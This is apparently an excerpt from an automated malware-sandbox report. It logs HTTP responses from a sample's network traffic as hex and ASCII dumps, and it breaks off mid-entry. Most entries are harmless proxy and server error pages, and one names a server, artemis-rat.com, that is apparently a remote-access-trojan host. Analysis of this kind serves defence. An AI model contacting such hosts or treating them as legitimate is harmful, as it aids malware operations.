                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:37 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:37 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:37 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailablecontent-length: 107cache-control: no-cachecontent-type: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:38 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:39 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:39 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 